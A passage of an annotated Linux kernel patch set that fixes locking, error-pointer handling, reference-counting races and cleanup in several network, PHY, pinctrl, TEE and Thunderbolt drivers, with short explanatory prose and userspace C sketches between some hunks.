+ 	if (!eth_proto_is_802_3(flower->common.protocol))
+ 		return -EOPNOTSUPP;
+ 
++	mutex_lock(&priv->nfp_fl_lock);
+ 	switch (flower->command) {
+ 	case FLOW_CLS_REPLACE:
+-		return nfp_flower_add_offload(app, netdev, flower);
++		ret = nfp_flower_add_offload(app, netdev, flower);
++		break;
+ 	case FLOW_CLS_DESTROY:
+-		return nfp_flower_del_offload(app, netdev, flower);
++		ret = nfp_flower_del_offload(app, netdev, flower);
++		break;
+ 	case FLOW_CLS_STATS:
+-		return nfp_flower_get_stats(app, netdev, flower);
++		ret = nfp_flower_get_stats(app, netdev, flower);
++		break;
+ 	default:
+-		return -EOPNOTSUPP;
++		ret = -EOPNOTSUPP;
++		break;
+ 	}
++	mutex_unlock(&priv->nfp_fl_lock);
++
++	return ret;
+ }
+ 
+ static int nfp_flower_setup_tc_block_cb(enum tc_setup_type type,
+@@ -1778,6 +1787,7 @@ static int nfp_flower_setup_tc_block(struct net_device *netdev,
+ 	repr_priv = repr->app_priv;
+ 	repr_priv->block_shared = f->block_shared;
+ 	f->driver_block_list = &nfp_block_cb_list;
++	f->unlocked_driver_cb = true;
+ 
+ 	switch (f->command) {
+ 	case FLOW_BLOCK_BIND:
+@@ -1876,6 +1886,8 @@ nfp_flower_setup_indr_tc_block(struct net_device *netdev, struct Qdisc *sch, str
+ 	     nfp_flower_internal_port_can_offload(app, netdev)))
+ 		return -EOPNOTSUPP;
+ 
++	f->unlocked_driver_cb = true;
++
+ 	switch (f->command) {
+ 	case FLOW_BLOCK_BIND:
+ 		cb_priv = nfp_flower_indr_block_cb_priv_lookup(app, netdev);
+diff --git a/drivers/net/ethernet/netronome/nfp/flower/qos_conf.c b/drivers/net/ethernet/netronome/nfp/flower/qos_conf.c
+index 99052a925d9ec..e7180b4793c7d 100644
+--- a/drivers/net/ethernet/netronome/nfp/flower/qos_conf.c
++++ b/drivers/net/ethernet/netronome/nfp/flower/qos_conf.c
+@@ -523,25 +523,31 @@ int nfp_flower_setup_qos_offload(struct nfp_app *app, struct net_device *netdev,
+ {
+ 	struct netlink_ext_ack *extack = flow->common.extack;
+ 	struct nfp_flower_priv *fl_priv = app->priv;
++	int ret;
+ 
+ 	if (!(fl_priv->flower_ext_feats & NFP_FL_FEATS_VF_RLIM)) {
+ 		NL_SET_ERR_MSG_MOD(extack, "unsupported offload: loaded firmware does not support qos rate limit offload");
+ 		return -EOPNOTSUPP;
+ 	}
+ 
++	mutex_lock(&fl_priv->nfp_fl_lock);
+ 	switch (flow->command) {
+ 	case TC_CLSMATCHALL_REPLACE:
+-		return nfp_flower_install_rate_limiter(app, netdev, flow,
+-						       extack);
++		ret = nfp_flower_install_rate_limiter(app, netdev, flow, extack);
++		break;
+ 	case TC_CLSMATCHALL_DESTROY:
+-		return nfp_flower_remove_rate_limiter(app, netdev, flow,
+-						      extack);
++		ret = nfp_flower_remove_rate_limiter(app, netdev, flow, extack);
++		break;
+ 	case TC_CLSMATCHALL_STATS:
+-		return nfp_flower_stats_rate_limiter(app, netdev, flow,
+-						     extack);
++		ret = nfp_flower_stats_rate_limiter(app, netdev, flow, extack);
++		break;
+ 	default:
+-		return -EOPNOTSUPP;
++		ret = -EOPNOTSUPP;
++		break;
+ 	}
++	mutex_unlock(&fl_priv->nfp_fl_lock);
++
++	return ret;
+ }
+ 
+ /* Offload tc action, currently only for tc police */
+diff --git a/drivers/net/ethernet/renesas/ravb_main.c b/drivers/net/ethernet/renesas/ravb_main.c
+index 894e2690c6437..9a52283d77544 100644
+--- a/drivers/net/ethernet/renesas/ravb_main.c
++++ b/drivers/net/ethernet/renesas/ravb_main.c
+@@ -2183,6 +2183,8 @@ static int ravb_close(struct net_device *ndev)
+ 			of_phy_deregister_fixed_link(np);
+ 	}
+ 
++	cancel_work_sync(&priv->work);
++
+ 	if (info->multi_irqs) {
+ 		free_irq(priv->tx_irqs[RAVB_NC], ndev);
+ 		free_irq(priv->rx_irqs[RAVB_NC], ndev);
+@@ -2907,8 +2909,6 @@ static int ravb_remove(struct platform_device *pdev)
+ 	clk_disable_unprepare(priv->gptp_clk);
+ 	clk_disable_unprepare(priv->refclk);
+ 
+-	dma_free_coherent(ndev->dev.parent, priv->desc_bat_size, priv->desc_bat,
+-			  priv->desc_bat_dma);
+ 	/* Set reset mode */
+ 	ravb_write(ndev, CCC_OPC_RESET, CCC);
+ 	unregister_netdev(ndev);
+@@ -2916,6 +2916,8 @@ static int ravb_remove(struct platform_device *pdev)
+ 		netif_napi_del(&priv->napi[RAVB_NC]);
+ 	netif_napi_del(&priv->napi[RAVB_BE]);
+ 	ravb_mdio_release(priv);
++	dma_free_coherent(ndev->dev.parent, priv->desc_bat_size, priv->desc_bat,
++			  priv->desc_bat_dma);
+ 	pm_runtime_put_sync(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+ 	reset_control_assert(priv->rstc);
+diff --git a/drivers/net/ieee802154/ca8210.c b/drivers/net/ieee802154/ca8210.c
+index d0b5129439ed6..c2201e0adc46c 100644
+--- a/drivers/net/ieee802154/ca8210.c
++++ b/drivers/net/ieee802154/ca8210.c
+@@ -2740,7 +2740,6 @@ static int ca8210_register_ext_clock(struct spi_device *spi)
+ 	struct device_node *np = spi->dev.of_node;
+ 	struct ca8210_priv *priv = spi_get_drvdata(spi);
+ 	struct ca8210_platform_data *pdata = spi->dev.platform_data;
+-	int ret = 0;
+ 
+ 	if (!np)
+ 		return -EFAULT;
+@@ -2757,18 +2756,8 @@ static int ca8210_register_ext_clock(struct spi_device *spi)
+ 		dev_crit(&spi->dev, "Failed to register external clk\n");
+ 		return PTR_ERR(priv->clk);
+ 	}
+-	ret = of_clk_add_provider(np, of_clk_src_simple_get, priv->clk);
+-	if (ret) {
+-		clk_unregister(priv->clk);
+-		dev_crit(
+-			&spi->dev,
+-			"Failed to register external clock as clock provider\n"
+-		);
+-	} else {
+-		dev_info(&spi->dev, "External clock set as clock provider\n");
+-	}
+ 
+-	return ret;
++	return of_clk_add_provider(np, of_clk_src_simple_get, priv->clk);
+ }
+ 
+ /**
+@@ -2780,8 +2769,8 @@ static void ca8210_unregister_ext_clock(struct spi_device *spi)
+ {
+ 	struct ca8210_priv *priv = spi_get_drvdata(spi);
+ 
+-	if (!priv->clk)
+-		return
++	if (IS_ERR_OR_NULL(priv->clk))
++		return;
+ 
+ 	of_clk_del_provider(spi->dev.of_node);
+ 	clk_unregister(priv->clk);
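
The switch to IS_ERR_OR_NULL() above is the interesting part: clk_register() reports failure as an errno encoded in the pointer itself, so the old '!priv->clk' test let error pointers straight through to of_clk_del_provider() and clk_unregister(). A userspace re-creation of the pointer-encoding convention (MAX_ERRNO mirrors the kernel's 4095):

#include <stdio.h>

#define MAX_ERRNO 4095

static inline void *ERR_PTR(long err) { return (void *)err; }
static inline long PTR_ERR(const void *p) { return (long)p; }
static inline int IS_ERR_OR_NULL(const void *p)
{
    return !p || (unsigned long)p >= (unsigned long)-MAX_ERRNO;
}

int main(void)
{
    void *clk = ERR_PTR(-22);   /* e.g. a failed clk_register() */

    if (!clk)
        puts("NULL check alone: error pointer slips through");
    if (IS_ERR_OR_NULL(clk))
        printf("caught error %ld\n", PTR_ERR(clk));
    return 0;
}

Only the second check fires here, which is exactly the case the unregister path needs to cover.
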
+diff --git a/drivers/net/macsec.c b/drivers/net/macsec.c
+index 578f470e9fad9..81453e84b6413 100644
+--- a/drivers/net/macsec.c
++++ b/drivers/net/macsec.c
+@@ -2384,6 +2384,7 @@ static int macsec_upd_txsa(struct sk_buff *skb, struct genl_info *info)
+ 
+ 		ctx.sa.assoc_num = assoc_num;
+ 		ctx.sa.tx_sa = tx_sa;
++		ctx.sa.update_pn = !!prev_pn.full64;
+ 		ctx.secy = secy;
+ 
+ 		ret = macsec_offload(ops->mdo_upd_txsa, &ctx);
+@@ -2477,6 +2478,7 @@ static int macsec_upd_rxsa(struct sk_buff *skb, struct genl_info *info)
+ 
+ 		ctx.sa.assoc_num = assoc_num;
+ 		ctx.sa.rx_sa = rx_sa;
++		ctx.sa.update_pn = !!prev_pn.full64;
+ 		ctx.secy = secy;
+ 
+ 		ret = macsec_offload(ops->mdo_upd_rxsa, &ctx);
+diff --git a/drivers/net/phy/mscc/mscc_macsec.c b/drivers/net/phy/mscc/mscc_macsec.c
+index f81b077618f40..81fd9bfef5271 100644
+--- a/drivers/net/phy/mscc/mscc_macsec.c
++++ b/drivers/net/phy/mscc/mscc_macsec.c
+@@ -844,6 +844,9 @@ static int vsc8584_macsec_upd_rxsa(struct macsec_context *ctx)
+ 	struct macsec_flow *flow;
+ 	int ret;
+ 
++	if (ctx->sa.update_pn)
++		return -EINVAL;
++
+ 	flow = vsc8584_macsec_find_flow(ctx, MACSEC_INGR);
+ 	if (IS_ERR(flow))
+ 		return PTR_ERR(flow);
+@@ -897,6 +900,9 @@ static int vsc8584_macsec_upd_txsa(struct macsec_context *ctx)
+ 	struct macsec_flow *flow;
+ 	int ret;
+ 
++	if (ctx->sa.update_pn)
++		return -EINVAL;
++
+ 	flow = vsc8584_macsec_find_flow(ctx, MACSEC_EGR);
+ 	if (IS_ERR(flow))
+ 		return PTR_ERR(flow);
+diff --git a/drivers/net/usb/dm9601.c b/drivers/net/usb/dm9601.c
+index 48d7d278631e9..99ec1d4a972db 100644
+--- a/drivers/net/usb/dm9601.c
++++ b/drivers/net/usb/dm9601.c
+@@ -222,13 +222,18 @@ static int dm9601_mdio_read(struct net_device *netdev, int phy_id, int loc)
+ 	struct usbnet *dev = netdev_priv(netdev);
+ 
+ 	__le16 res;
++	int err;
+ 
+ 	if (phy_id) {
+ 		netdev_dbg(dev->net, "Only internal phy supported\n");
+ 		return 0;
+ 	}
+ 
+-	dm_read_shared_word(dev, 1, loc, &res);
++	err = dm_read_shared_word(dev, 1, loc, &res);
++	if (err < 0) {
++		netdev_err(dev->net, "MDIO read error: %d\n", err);
++		return err;
++	}
+ 
+ 	netdev_dbg(dev->net,
+ 		   "dm9601_mdio_read() phy_id=0x%02x, loc=0x%02x, returns=0x%04x\n",
+diff --git a/drivers/net/xen-netback/interface.c b/drivers/net/xen-netback/interface.c
+index f3f2c07423a6a..fc3bb63b9ac3e 100644
+--- a/drivers/net/xen-netback/interface.c
++++ b/drivers/net/xen-netback/interface.c
+@@ -41,8 +41,6 @@
+ #include <asm/xen/hypercall.h>
+ #include <xen/balloon.h>
+ 
+-#define XENVIF_QUEUE_LENGTH 32
+-
+ /* Number of bytes allowed on the internal guest Rx queue. */
+ #define XENVIF_RX_QUEUE_BYTES (XEN_NETIF_RX_RING_SIZE/2 * PAGE_SIZE)
+ 
+@@ -530,8 +528,6 @@ struct xenvif *xenvif_alloc(struct device *parent, domid_t domid,
+ 	dev->features = dev->hw_features | NETIF_F_RXCSUM;
+ 	dev->ethtool_ops = &xenvif_ethtool_ops;
+ 
+-	dev->tx_queue_len = XENVIF_QUEUE_LENGTH;
+-
+ 	dev->min_mtu = ETH_MIN_MTU;
+ 	dev->max_mtu = ETH_MAX_MTU - VLAN_ETH_HLEN;
+ 
+diff --git a/drivers/perf/arm-cmn.c b/drivers/perf/arm-cmn.c
+index 90008e24d1cc7..cfb36adf4eb80 100644
+--- a/drivers/perf/arm-cmn.c
++++ b/drivers/perf/arm-cmn.c
+@@ -1822,7 +1822,7 @@ static irqreturn_t arm_cmn_handle_irq(int irq, void *dev_id)
+ 		u64 delta;
+ 		int i;
+ 
+-		for (i = 0; i < CMN_DTM_NUM_COUNTERS; i++) {
++		for (i = 0; i < CMN_DT_NUM_COUNTERS; i++) {
+ 			if (status & (1U << i)) {
+ 				ret = IRQ_HANDLED;
+ 				if (WARN_ON(!dtc->counters[i]))
+diff --git a/drivers/phy/freescale/phy-fsl-lynx-28g.c b/drivers/phy/freescale/phy-fsl-lynx-28g.c
+index 569f12af2aafa..0a8b40edc3f31 100644
+--- a/drivers/phy/freescale/phy-fsl-lynx-28g.c
++++ b/drivers/phy/freescale/phy-fsl-lynx-28g.c
+@@ -126,6 +126,10 @@ struct lynx_28g_lane {
+ struct lynx_28g_priv {
+ 	void __iomem *base;
+ 	struct device *dev;
++	/* Serialize concurrent access to registers shared between lanes,
++	 * like PCCn
++	 */
++	spinlock_t pcc_lock;
+ 	struct lynx_28g_pll pll[LYNX_28G_NUM_PLL];
+ 	struct lynx_28g_lane lane[LYNX_28G_NUM_LANE];
+ 
+@@ -396,6 +400,8 @@ static int lynx_28g_set_mode(struct phy *phy, enum phy_mode mode, int submode)
+ 	if (powered_up)
+ 		lynx_28g_power_off(phy);
+ 
++	spin_lock(&priv->pcc_lock);
++
+ 	switch (submode) {
+ 	case PHY_INTERFACE_MODE_SGMII:
+ 	case PHY_INTERFACE_MODE_1000BASEX:
+@@ -412,6 +418,8 @@ static int lynx_28g_set_mode(struct phy *phy, enum phy_mode mode, int submode)
+ 	lane->interface = submode;
+ 
+ out:
++	spin_unlock(&priv->pcc_lock);
++
+ 	/* Power up the lane if necessary */
+ 	if (powered_up)
+ 		lynx_28g_power_on(phy);
+@@ -507,11 +515,12 @@ static void lynx_28g_cdr_lock_check(struct work_struct *work)
+ 	for (i = 0; i < LYNX_28G_NUM_LANE; i++) {
+ 		lane = &priv->lane[i];
+ 
+-		if (!lane->init)
+-			continue;
++		mutex_lock(&lane->phy->mutex);
+ 
+-		if (!lane->powered_up)
++		if (!lane->init || !lane->powered_up) {
++			mutex_unlock(&lane->phy->mutex);
+ 			continue;
++		}
+ 
+ 		rrstctl = lynx_28g_lane_read(lane, LNaRRSTCTL);
+ 		if (!(rrstctl & LYNX_28G_LNaRRSTCTL_CDR_LOCK)) {
+@@ -520,6 +529,8 @@ static void lynx_28g_cdr_lock_check(struct work_struct *work)
+ 				rrstctl = lynx_28g_lane_read(lane, LNaRRSTCTL);
+ 			} while (!(rrstctl & LYNX_28G_LNaRRSTCTL_RST_DONE));
+ 		}
++
++		mutex_unlock(&lane->phy->mutex);
+ 	}
+ 	queue_delayed_work(system_power_efficient_wq, &priv->cdr_check,
+ 			   msecs_to_jiffies(1000));
+@@ -592,6 +603,7 @@ static int lynx_28g_probe(struct platform_device *pdev)
+ 
+ 	dev_set_drvdata(dev, priv);
+ 
++	spin_lock_init(&priv->pcc_lock);
+ 	INIT_DELAYED_WORK(&priv->cdr_check, lynx_28g_cdr_lock_check);
+ 
+ 	queue_delayed_work(system_power_efficient_wq, &priv->cdr_check,
+@@ -603,6 +615,14 @@ static int lynx_28g_probe(struct platform_device *pdev)
+ 	return PTR_ERR_OR_ZERO(provider);
+ }
+ 
++static void lynx_28g_remove(struct platform_device *pdev)
++{
++	struct device *dev = &pdev->dev;
++	struct lynx_28g_priv *priv = dev_get_drvdata(dev);
++
++	cancel_delayed_work_sync(&priv->cdr_check);
++}
++
+ static const struct of_device_id lynx_28g_of_match_table[] = {
+ 	{ .compatible = "fsl,lynx-28g" },
+ 	{ },
+@@ -611,6 +631,7 @@ MODULE_DEVICE_TABLE(of, lynx_28g_of_match_table);
+ 
+ static struct platform_driver lynx_28g_driver = {
+ 	.probe	= lynx_28g_probe,
++	.remove_new = lynx_28g_remove,
+ 	.driver	= {
+ 		.name = "lynx-28g",
+ 		.of_match_table = lynx_28g_of_match_table,
+diff --git a/drivers/pinctrl/core.c b/drivers/pinctrl/core.c
+index 9e57f4c62e609..27e41873c04ff 100644
+--- a/drivers/pinctrl/core.c
++++ b/drivers/pinctrl/core.c
+@@ -1007,17 +1007,20 @@ static int add_setting(struct pinctrl *p, struct pinctrl_dev *pctldev,
+ 
+ static struct pinctrl *find_pinctrl(struct device *dev)
+ {
+-	struct pinctrl *p;
++	struct pinctrl *entry, *p = NULL;
+ 
+ 	mutex_lock(&pinctrl_list_mutex);
+-	list_for_each_entry(p, &pinctrl_list, node)
+-		if (p->dev == dev) {
+-			mutex_unlock(&pinctrl_list_mutex);
+-			return p;
++
++	list_for_each_entry(entry, &pinctrl_list, node) {
++		if (entry->dev == dev) {
++			p = entry;
++			kref_get(&p->users);
++			break;
+ 		}
++	}
+ 
+ 	mutex_unlock(&pinctrl_list_mutex);
+-	return NULL;
++	return p;
+ }
+ 
+ static void pinctrl_free(struct pinctrl *p, bool inlist);
+@@ -1126,7 +1129,6 @@ struct pinctrl *pinctrl_get(struct device *dev)
+ 	p = find_pinctrl(dev);
+ 	if (p) {
+ 		dev_dbg(dev, "obtain a copy of previously claimed pinctrl\n");
+-		kref_get(&p->users);
+ 		return p;
+ 	}
+ 
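
The rework above closes a narrow race: previously the kref_get() happened in pinctrl_get() after pinctrl_list_mutex had been dropped, leaving a window in which a concurrent pinctrl_put() could release the last reference and free the entry. Taking the reference while still holding the list lock removes the window. A userspace analog with hypothetical types:

#include <pthread.h>
#include <stdatomic.h>
#include <stddef.h>

struct entry {
    const void *dev;
    atomic_int refs;
    struct entry *next;
};

static pthread_mutex_t list_lock = PTHREAD_MUTEX_INITIALIZER;
static struct entry *head;

static struct entry *find_and_get(const void *dev)
{
    struct entry *e, *found = NULL;

    pthread_mutex_lock(&list_lock);
    for (e = head; e; e = e->next) {
        if (e->dev == dev) {
            found = e;
            atomic_fetch_add(&found->refs, 1);  /* get while locked */
            break;
        }
    }
    pthread_mutex_unlock(&list_lock);
    return found;   /* NULL when absent, referenced entry otherwise */
}

int main(void)
{
    static const char dev_id[] = "uart0";
    struct entry e = { .dev = dev_id, .refs = 1, .next = NULL };

    head = &e;
    return find_and_get(dev_id) ? 0 : 1;
}
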
+diff --git a/drivers/pinctrl/nuvoton/pinctrl-wpcm450.c b/drivers/pinctrl/nuvoton/pinctrl-wpcm450.c
+index 8193b92da4031..274e01d5212d5 100644
+--- a/drivers/pinctrl/nuvoton/pinctrl-wpcm450.c
++++ b/drivers/pinctrl/nuvoton/pinctrl-wpcm450.c
+@@ -1041,13 +1041,13 @@ static int wpcm450_gpio_register(struct platform_device *pdev,
+ 		if (ret < 0)
+ 			return ret;
+ 
+-		gpio = &pctrl->gpio_bank[reg];
+-		gpio->pctrl = pctrl;
+-
+ 		if (reg >= WPCM450_NUM_BANKS)
+ 			return dev_err_probe(dev, -EINVAL,
+ 					     "GPIO index %d out of range!\n", reg);
+ 
++		gpio = &pctrl->gpio_bank[reg];
++		gpio->pctrl = pctrl;
++
+ 		bank = &wpcm450_banks[reg];
+ 		gpio->bank = bank;
+ 
+diff --git a/drivers/pinctrl/renesas/Kconfig b/drivers/pinctrl/renesas/Kconfig
+index 0903a0a418319..1ef8759802618 100644
+--- a/drivers/pinctrl/renesas/Kconfig
++++ b/drivers/pinctrl/renesas/Kconfig
+@@ -240,6 +240,7 @@ config PINCTRL_RZN1
+ 	depends on OF
+ 	depends on ARCH_RZN1 || COMPILE_TEST
+ 	select GENERIC_PINCONF
++	select PINMUX
+ 	help
+ 	  This selects pinctrl driver for Renesas RZ/N1 devices.
+ 
+diff --git a/drivers/platform/x86/hp/hp-wmi.c b/drivers/platform/x86/hp/hp-wmi.c
+index 3bacee2b8d521..51f23ff1f2b05 100644
+--- a/drivers/platform/x86/hp/hp-wmi.c
++++ b/drivers/platform/x86/hp/hp-wmi.c
+@@ -1399,7 +1399,13 @@ static const struct dev_pm_ops hp_wmi_pm_ops = {
+ 	.restore  = hp_wmi_resume_handler,
+ };
+ 
+-static struct platform_driver hp_wmi_driver = {
++/*
++ * hp_wmi_bios_remove() lives in .exit.text. For drivers registered via
++ * module_platform_driver_probe() this is ok because they cannot get unbound at
++ * runtime. So mark the driver struct with __refdata to prevent modpost
++ * triggering a section mismatch warning.
++ */
++static struct platform_driver hp_wmi_driver __refdata = {
+ 	.driver = {
+ 		.name = "hp-wmi",
+ 		.pm = &hp_wmi_pm_ops,
+diff --git a/drivers/platform/x86/think-lmi.c b/drivers/platform/x86/think-lmi.c
+index f6290221d139d..6641f934f15bf 100644
+--- a/drivers/platform/x86/think-lmi.c
++++ b/drivers/platform/x86/think-lmi.c
+@@ -1245,6 +1245,24 @@ static void tlmi_release_attr(void)
+ 	kset_unregister(tlmi_priv.authentication_kset);
+ }
+ 
++static int tlmi_validate_setting_name(struct kset *attribute_kset, char *name)
++{
++	struct kobject *duplicate;
++
++	if (!strcmp(name, "Reserved"))
++		return -EINVAL;
++
++	duplicate = kset_find_obj(attribute_kset, name);
++	if (duplicate) {
++		pr_debug("Duplicate attribute name found - %s\n", name);
++		/* kset_find_obj() returns a reference */
++		kobject_put(duplicate);
++		return -EBUSY;
++	}
++
++	return 0;
++}
++
+ static int tlmi_sysfs_init(void)
+ {
+ 	int i, ret;
+@@ -1273,10 +1291,8 @@ static int tlmi_sysfs_init(void)
+ 			continue;
+ 
+ 		/* check for duplicate or reserved values */
+-		if (kset_find_obj(tlmi_priv.attribute_kset, tlmi_priv.setting[i]->display_name) ||
+-		    !strcmp(tlmi_priv.setting[i]->display_name, "Reserved")) {
+-			pr_debug("duplicate or reserved attribute name found - %s\n",
+-				tlmi_priv.setting[i]->display_name);
++		if (tlmi_validate_setting_name(tlmi_priv.attribute_kset,
++					       tlmi_priv.setting[i]->display_name) < 0) {
+ 			kfree(tlmi_priv.setting[i]->possible_values);
+ 			kfree(tlmi_priv.setting[i]);
+ 			tlmi_priv.setting[i] = NULL;
+diff --git a/drivers/scsi/scsi_scan.c b/drivers/scsi/scsi_scan.c
+index ed26c52ed8474..bab00b65bc9d1 100644
+--- a/drivers/scsi/scsi_scan.c
++++ b/drivers/scsi/scsi_scan.c
+@@ -1619,12 +1619,13 @@ int scsi_rescan_device(struct scsi_device *sdev)
+ 	device_lock(dev);
+ 
+ 	/*
+-	 * Bail out if the device is not running. Otherwise, the rescan may
+-	 * block waiting for commands to be executed, with us holding the
+-	 * device lock. This can result in a potential deadlock in the power
+-	 * management core code when system resume is on-going.
++	 * Bail out if the device or its queue are not running. Otherwise,
++	 * the rescan may block waiting for commands to be executed, with us
++	 * holding the device lock. This can result in a potential deadlock
++	 * in the power management core code when system resume is on-going.
+ 	 */
+-	if (sdev->sdev_state != SDEV_RUNNING) {
++	if (sdev->sdev_state != SDEV_RUNNING ||
++	    blk_queue_pm_only(sdev->request_queue)) {
+ 		ret = -EWOULDBLOCK;
+ 		goto unlock;
+ 	}
+diff --git a/drivers/tee/amdtee/core.c b/drivers/tee/amdtee/core.c
+index 372d64756ed64..3c15f6a9e91c0 100644
+--- a/drivers/tee/amdtee/core.c
++++ b/drivers/tee/amdtee/core.c
+@@ -217,12 +217,12 @@ unlock:
+ 	return rc;
+ }
+ 
++/* mutex must be held by caller */
+ static void destroy_session(struct kref *ref)
+ {
+ 	struct amdtee_session *sess = container_of(ref, struct amdtee_session,
+ 						   refcount);
+ 
+-	mutex_lock(&session_list_mutex);
+ 	list_del(&sess->list_node);
+ 	mutex_unlock(&session_list_mutex);
+ 	kfree(sess);
+@@ -272,7 +272,8 @@ int amdtee_open_session(struct tee_context *ctx,
+ 	if (arg->ret != TEEC_SUCCESS) {
+ 		pr_err("open_session failed %d\n", arg->ret);
+ 		handle_unload_ta(ta_handle);
+-		kref_put(&sess->refcount, destroy_session);
++		kref_put_mutex(&sess->refcount, destroy_session,
++			       &session_list_mutex);
+ 		goto out;
+ 	}
+ 
+@@ -290,7 +291,8 @@ int amdtee_open_session(struct tee_context *ctx,
+ 		pr_err("reached maximum session count %d\n", TEE_NUM_SESSIONS);
+ 		handle_close_session(ta_handle, session_info);
+ 		handle_unload_ta(ta_handle);
+-		kref_put(&sess->refcount, destroy_session);
++		kref_put_mutex(&sess->refcount, destroy_session,
++			       &session_list_mutex);
+ 		rc = -ENOMEM;
+ 		goto out;
+ 	}
+@@ -331,7 +333,7 @@ int amdtee_close_session(struct tee_context *ctx, u32 session)
+ 	handle_close_session(ta_handle, session_info);
+ 	handle_unload_ta(ta_handle);
+ 
+-	kref_put(&sess->refcount, destroy_session);
++	kref_put_mutex(&sess->refcount, destroy_session, &session_list_mutex);
+ 
+ 	return 0;
+ }
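
kref_put_mutex() takes the mutex only when the count actually drops to zero, which is why destroy_session() may assume session_list_mutex is held and merely unlocks it. Below is a deliberately simplified userspace analog; the kernel's refcount_dec_and_mutex_lock() orders the final decrement against the lock more carefully than this sketch does:

#include <pthread.h>
#include <stdatomic.h>
#include <stdio.h>

struct obj {
    atomic_int refs;
};

static pthread_mutex_t list_lock = PTHREAD_MUTEX_INITIALIZER;

static void release(struct obj *o)
{
    /* Caller guarantees list_lock is held: safe to unlink here. */
    printf("released %p\n", (void *)o);
    pthread_mutex_unlock(&list_lock);
}

static void put_mutex(struct obj *o)
{
    if (atomic_fetch_sub(&o->refs, 1) == 1) {
        pthread_mutex_lock(&list_lock);
        release(o);     /* returns with list_lock dropped */
    }
}

int main(void)
{
    struct obj o = { .refs = 1 };

    put_mutex(&o);
    return 0;
}
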
+diff --git a/drivers/thunderbolt/icm.c b/drivers/thunderbolt/icm.c
+index 86521ebb25794..69b2ca95fe37a 100644
+--- a/drivers/thunderbolt/icm.c
++++ b/drivers/thunderbolt/icm.c
+@@ -41,6 +41,7 @@
+ #define PHY_PORT_CS1_LINK_STATE_SHIFT	26
+ 
+ #define ICM_TIMEOUT			5000	/* ms */
++#define ICM_RETRIES			3
+ #define ICM_APPROVE_TIMEOUT		10000	/* ms */
+ #define ICM_MAX_LINK			4
+ 
+@@ -296,10 +297,9 @@ static bool icm_copy(struct tb_cfg_request *req, const struct ctl_pkg *pkg)
+ 
+ static int icm_request(struct tb *tb, const void *request, size_t request_size,
+ 		       void *response, size_t response_size, size_t npackets,
+-		       unsigned int timeout_msec)
++		       int retries, unsigned int timeout_msec)
+ {
+ 	struct icm *icm = tb_priv(tb);
+-	int retries = 3;
+ 
+ 	do {
+ 		struct tb_cfg_request *req;
+@@ -410,7 +410,7 @@ static int icm_fr_get_route(struct tb *tb, u8 link, u8 depth, u64 *route)
+ 		return -ENOMEM;
+ 
+ 	ret = icm_request(tb, &request, sizeof(request), switches,
+-			  sizeof(*switches), npackets, ICM_TIMEOUT);
++			  sizeof(*switches), npackets, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		goto err_free;
+ 
+@@ -463,7 +463,7 @@ icm_fr_driver_ready(struct tb *tb, enum tb_security_level *security_level,
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -488,7 +488,7 @@ static int icm_fr_approve_switch(struct tb *tb, struct tb_switch *sw)
+ 	memset(&reply, 0, sizeof(reply));
+ 	/* Use larger timeout as establishing tunnels can take some time */
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_APPROVE_TIMEOUT);
++			  1, ICM_RETRIES, ICM_APPROVE_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -515,7 +515,7 @@ static int icm_fr_add_switch_key(struct tb *tb, struct tb_switch *sw)
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -543,7 +543,7 @@ static int icm_fr_challenge_switch_key(struct tb *tb, struct tb_switch *sw,
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -577,7 +577,7 @@ static int icm_fr_approve_xdomain_paths(struct tb *tb, struct tb_xdomain *xd,
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1022,7 +1022,7 @@ icm_tr_driver_ready(struct tb *tb, enum tb_security_level *security_level,
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, 20000);
++			  1, 10, 2000);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1055,7 +1055,7 @@ static int icm_tr_approve_switch(struct tb *tb, struct tb_switch *sw)
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_APPROVE_TIMEOUT);
++			  1, ICM_RETRIES, ICM_APPROVE_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1083,7 +1083,7 @@ static int icm_tr_add_switch_key(struct tb *tb, struct tb_switch *sw)
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1112,7 +1112,7 @@ static int icm_tr_challenge_switch_key(struct tb *tb, struct tb_switch *sw,
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1146,7 +1146,7 @@ static int icm_tr_approve_xdomain_paths(struct tb *tb, struct tb_xdomain *xd,
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
